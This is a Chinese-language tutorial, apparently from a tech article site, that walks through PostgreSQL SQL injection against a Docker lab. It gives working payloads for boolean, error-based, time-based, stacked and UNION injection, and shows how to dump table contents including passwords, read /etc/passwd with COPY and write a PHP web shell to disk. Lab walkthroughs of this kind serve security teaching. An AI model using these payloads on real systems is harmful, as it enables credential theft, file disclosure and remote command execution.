溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

postgresql注入的示例分析

發(fā)布時間:2021-11-26 09:32:44 來源:億速云 閱讀:168 作者:小新 欄目:網(wǎng)絡(luò)管理

小編給大家分享一下postgresql注入的示例分析,相信大部分人都還不怎么了解,因此分享這篇文章給大家參考一下,希望大家閱讀完這篇文章后大有收獲,下面讓我們一起去了解一下吧!

PostgreSQL 是一個免費的對象-關(guān)系數(shù)據(jù)庫服務(wù)器 (ORDBMS),在靈活的 BSD 許可證下發(fā)行。

PostgreSQL 開發(fā)者把它念作 post-gress-Q-L。

PostgreSQL 的 Slogan 是 "世界上最先進的開源關(guān)系型數(shù)據(jù)庫"。

這里我們通過一個簡單的靶場來學(xué)習(xí) postgresql 數(shù)據(jù)庫相關(guān)漏洞

一、瀏覽器訪問數(shù)據(jù)

這里我們是利用 docker 搭建的環(huán)境

訪問我們搭建的地址:http://172.16.1.238:90/index.php?uid=1

postgresql注入的示例分析

二、驗證注入

基于布爾型注入(boolean-based blind)

index.php?uid=1 AND 1=1 運行正常

index.php?uid=1 AND 1=2 運行異常

postgresql注入的示例分析

postgresql注入的示例分析

基于報錯注入(error-based)

獲取版本號:

select * from tbuser where id=1 AND 7778=CAST((SELECT version())::text AS NUMERIC)

postgresql注入的示例分析

獲取 Schemas 名稱

select * from tbuser where id=1 AND 7778=CAST((SELECT schemaname FROM pg_tables limit 1)::text AS NUMERIC)

postgresql注入的示例分析

基于時間的盲注(time-based blind)

AND 6489=(SELECT 6489 FROM PG_SLEEP(5)) 延時 5 秒

postgresql注入的示例分析

基于堆疊查詢(多語句查詢,stacked queries)

?uid=1;select PG_SLEEP(5)--

postgresql注入的示例分析

基于聯(lián)合查詢(UNION query)

?uid=1 order by 1,2,3 運行正常

?uid=1 order by 1,2,3,4 運行異常,獲取字段數(shù) 3

?uid=1 UNION ALL SELECT NULL,('11111'),NULL-- 查看是否輸出 11111

postgresql注入的示例分析

postgresql注入的示例分析

postgresql注入的示例分析

獲取數(shù)據(jù)庫結(jié)構(gòu)和內(nèi)容

此處均為聯(lián)合查詢

獲取模式名稱(schemaname)名稱

?uid=1 UNION SELECT NULL,COALESCE(CAST(schemaname AS CHARACTER(10000)),(CHR(32))),NULL FROM pg_tables--

語法解析:

COALESCE(expression[,n]) coalesce 函數(shù)返回參數(shù)(列名)中第一個非 NULL 值的字段值,注意不是為空''

cast ('1' as numeric) 1 轉(zhuǎn)換為數(shù)字類型

簡化:

?uid=1 UNION SELECT NULL,schemaname,NULL FROM pg_tables--

postgresql注入的示例分析

用戶創(chuàng)建的數(shù)據(jù)庫默認模式名稱(schemaname)為 public

獲取數(shù)據(jù)表名稱

uid=1 UNION ALL SELECT NULL,tablename,NULL FROM pg_tables WHERE schemaname IN ('public')

postgresql注入的示例分析

獲取表字段名稱

?uid=1 UNION SELECT NULL,attname,NULL FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND a.relname='tbuser' AND nspname='public'—

postgresql注入的示例分析

獲取表內(nèi)容

?uid=1 UNION ALL SELECT NULL,id||','||username||','||passwd,NULL FROM public.tbuser--

postgresql注入的示例分析

三、文件或目錄操作

PostgreSQL 中部分內(nèi)置函數(shù)、表

postgresql注入的示例分析

列目錄——只能列安裝目錄下的文件

?uid=1 union select NULL,NULL,pg_ls_dir('./')

postgresql注入的示例分析

讀文件

?uid=1;

CREATE TABLE passwd(t TEXT);

COPY passwd FROM '/etc/passwd';

SELECT NULL,t,NULL FROM passwd;

postgresql注入的示例分析

寫文件

?uid=1;

DROP TABLE pass;(這里需要為數(shù)據(jù)庫存在的表)

CREATE TABLE hacktb (t TEXT);

INSERT INTO hacktb(t) VALUES ('<?php @system("$_GET[cmd]");?>');

COPY hacktb(t) TO '/tmp/hack.php';

postgresql注入的示例分析

postgresql注入的示例分析

以上是“postgresql注入的示例分析”這篇文章的所有內(nèi)容,感謝各位的閱讀!相信大家都有了一定的了解,希望分享的內(nèi)容對大家有所幫助,如果還想學(xué)習(xí)更多知識,歡迎關(guān)注億速云行業(yè)資訊頻道!

向AI問一下細節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI